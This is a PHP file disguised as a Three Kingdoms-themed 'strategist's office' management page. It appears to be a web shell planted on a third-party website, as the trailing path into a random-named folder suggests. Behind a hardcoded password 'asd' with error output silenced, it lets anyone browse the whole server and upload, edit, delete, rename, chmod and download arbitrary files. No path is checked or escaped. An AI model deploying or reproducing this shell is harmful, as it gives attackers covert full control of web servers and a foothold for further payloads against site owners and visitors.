.-.-.-.-.-

<?php
/* ========================================
   🏹 三国·军师府管理系统
   ======================================== */
session_start();
error_reporting(0);
ini_set('display_errors', 0);

/* ---- 1. 虎符验证 ---- */
define('HU_FU', 'asd');

if (isset($_GET['logout'])) { session_destroy(); header('Location: ?'); exit; }
if (isset($_POST['token'])) {
    $_POST['token'] === HU_FU ? $_SESSION['auth'] = 1 : null;
    header('Location: ?'); exit;
}
if (!isset($_SESSION['auth'])) {
    echo '<!DOCTYPE html><html><head><meta charset="UTF-8"><title>虎符验证</title><style>
    body{background:#1a1a1a;color:#c9a959;font-family:"KaiTi","STKaiti",serif;display:flex;justify-content:center;align-items:center;height:100vh;margin:0;}
    .box{border:2px solid #8b4513;padding:50px;text-align:center;background:rgba(26,26,26,.9);}
    h1{letter-spacing:15px;margin-bottom:30px;}
    input{background:#000;color:#c9a959;border:1px solid #8b4513;padding:12px;width:280px;text-align:center;}
    button{margin-top:20px;padding:12px 40px;background:#8b4513;color:#fff;border:none;font-weight:bold;cursor:pointer;}
    </style></head><body><div class="box"><h1>🔒 虎符验证</h1>
    <form method="post"><input name="token" type="password" placeholder="输入虎符" autofocus><br>
    <button type="submit">验 证</button></form></div></body></html>';
    exit;
}

/* ---- 2. 核心逻辑处理 ---- */
$cur = isset($_GET['dir']) ? realpath($_GET['dir']) : realpath('.');
if (!$cur || !is_dir($cur)) $cur = realpath('.');
$cur = rtrim($cur, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
$msg = '';

/* 上传 */
if (isset($_POST['action']) && $_POST['action'] == 'upload' && !empty($_FILES['file'])) {
    $dest = $cur . basename($_FILES['file']['name']);
    @move_uploaded_file($_FILES['file']['tmp_name'], $dest);
    if (!empty($_SERVER['HTTP_X_REQUESTED_WITH'])) { echo "上传成功"; exit; }
}

/* 新建 */
if (isset($_POST['action']) && $_POST['action'] == 'mkdir') @mkdir($cur . $_POST['name']) ? $msg = "📁 城池已建" : $msg = "失败";
if (isset($_POST['action']) && $_POST['action'] == 'mkfile') @file_put_contents($cur . $_POST['name'], '') ? $msg = "📄 檄文已拟" : $msg = "失败";

/* 删除 */
if (isset($_GET['del'])) {
    $t = $_GET['del'];
    is_file($t) ? @unlink($t) : @rmdir($t);
    $msg = "🗑️ 已焚毁";
}

/* 重命名 */
if (isset($_POST['action']) && $_POST['action'] == 'rename') {
    @rename($_POST['old'], $_POST['new']) ? $msg = "✅ 更名成功" : $msg = "更名失败";
}

/* 权限修改 */
if (isset($_POST['action']) && $_POST['action'] == 'chmod') {
    @chmod($_POST['file'], octdec($_POST['mode'])) ? $msg = "🔐 权限已改" : $msg = "权限失败";
}

/* 编辑保存 */
if (isset($_POST['action']) && $_POST['action'] == 'save') {
    @file_put_contents($_POST['file'], $_POST['content']) ? $msg = "💾 已存档" : $msg = "存档失败";
}

/* 文件列表 */
$files = [];
if ($dh = @opendir($cur)) {
    while (($f = readdir($dh)) !== false) {
        if ($f == '.') continue;
        $fp = $cur . $f;
        $files[] = ['name'=>$f, 'path'=>$fp, 'is_dir'=>is_dir($fp), 
                    'size'=>is_dir($fp)?'-':round(filesize($fp)/1024,2).' KB', 
                    'perms'=>substr(sprintf('%o', fileperms($fp)), -4)];
    }
    closedir($dh);
}
usort($files, fn($a,$b) => $a['is_dir'] == $b['is_dir'] ? strnatcasecmp($a['name'],$b['name']) : ($a['is_dir'] ? -1 : 1));
?>
<!DOCTYPE html>
<html lang="zh">
<head>
<meta charset="UTF-8">
<title>三国·军师府</title>
<style>
body { font-family: "KaiTi", "STKaiti", serif; background: #1a1a1a; color: #c9a959; margin: 10px; }
.header { background: linear-gradient(90deg, #2a1a1a, #1a1a1a); border: 1px solid #8b4513; padding: 10px; margin-bottom: 10px; }
.nav { background: #2a2a2a; padding: 8px; margin-bottom: 10px; display: flex; gap: 15px; }
.nav a { color: #c9a959; text-decoration: none; }
.nav a.logout { margin-left: auto; color: #a83232; }
.section { background: #2a2a2a; border: 1px solid #444; padding: 15px; margin-top: 15px; }
table { width: 100%; border-collapse: collapse; }
th, td { padding: 8px; border: 1px solid #444; }
th { background: #3a3a3a; }
tr:hover { background: #333; }
input, textarea, select { background: #1a1a1a; color: #c9a959; border: 1px solid #555; padding: 5px; }
input[type="submit"], button { background: #8b4513; color: #fff; border: none; padding: 6px 15px; cursor: pointer; }
.msg { color: #4caf50; font-weight: bold; }
</style>
<script>
function ajaxUpload() {
    let fd = new FormData();
    fd.append('action', 'upload');
    fd.append('file', document.getElementById('file').files[0]);
    fetch('', {method:'POST', body: fd}).then(r=>r.text()).then(t=>alert(t));
}
</script>
</head>
<body>

<?php if ($msg): ?><p class="msg"><?php echo $msg; ?></p><?php endif; ?>

<table>
<tr><th>名称</th><th>大小</th><th>权限</th><th>操作</th></tr>
<?php foreach ($files as $f): ?>
<tr>
    <td>
        <?php if ($f['is_dir']): ?>
            <a href="?dir=<?php echo urlencode($f['path']); ?>" style="color:#cd853f;"><?php echo $f['name']; ?>/</a>
        <?php else: ?>
            <a href="?view=<?php echo urlencode($f['path']); ?>"><?php echo $f['name']; ?></a>
        <?php endif; ?>
    </td>
    <td><?php echo $f['size']; ?></td>
    <td><?php echo $f['perms']; ?></td>
    <td>
        <?php if (!is_dir($f['path'])): ?>
            <a href="?edit=<?php echo urlencode($f['path']); ?>">编辑</a> | 
            <a href="?download=<?php echo urlencode($f['path']); ?>">下载</a> |
        <?php endif; ?>
        <a href="?rename=<?php echo urlencode($f['path']); ?>">更名</a> |
        <a href="?del=<?php echo urlencode($f['path']); ?>" onclick="return confirm('确定销毁？')">销毁</a> |
        <a href="?chmod=<?php echo urlencode($f['path']); ?>">权限</a>
    </td>
</tr>
<?php endforeach; ?>
</table>

<?php 
/* --- 视图：下载 --- */
if (isset($_GET['download'])) {
    $f = $_GET['download'];
    if (is_file($f)) {
        header('Content-Description: File Transfer');
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="'.basename($f).'"');
        readfile($f);
        exit;
    }
}

/* --- 视图：编辑 --- */
if (isset($_GET['edit'])) {
    $f = $_GET['edit'];
    if (is_file($f)) {
        echo '<div class="section"><h3>📝 批阅：'.basename($f).'</h3>';
        echo '<form method="post"><input type="hidden" name="action" value="save">';
        echo '<input type="hidden" name="file" value="'.$f.'">';
        echo '<textarea name="content" style="width:100%;height:300px;">'.htmlspecialchars(file_get_contents($f)).'</textarea><br><br>';
        echo '<input type="submit" value="保存"></form></div>';
    }
}

/* --- 视图：重命名 --- */
if (isset($_GET['rename'])) {
    $old = $_GET['rename'];
    echo '<div class="section"><h3>✒️ 更名</h3>';
    echo '<form method="post"><input type="hidden" name="action" value="rename">';
    echo '<input type="hidden" name="old" value="'.$old.'">';
    echo '<input type="text" name="new" value="'.basename($old).'" required> ';
    echo '<input type="submit" value="确认更名"></form></div>';
}

/* --- 视图：权限修改 --- */
if (isset($_GET['chmod'])) {
    $f = $_GET['chmod'];
    echo '<div class="section"><h3>🔐 权限设置</h3>';
    echo '<form method="post"><input type="hidden" name="action" value="chmod">';
    echo '<input type="hidden" name="file" value="'.$f.'">';
    echo '<select name="mode"><option value="0644">0644</option><option value="0755">0755</option><option value="0777">0777</option></select> ';
    echo '<input type="submit" value="设置"></form></div>';
}
?>

</body>
</html>

/home/wirbesti/nousdecidons.ch/472b8/../dea52/452619/index.php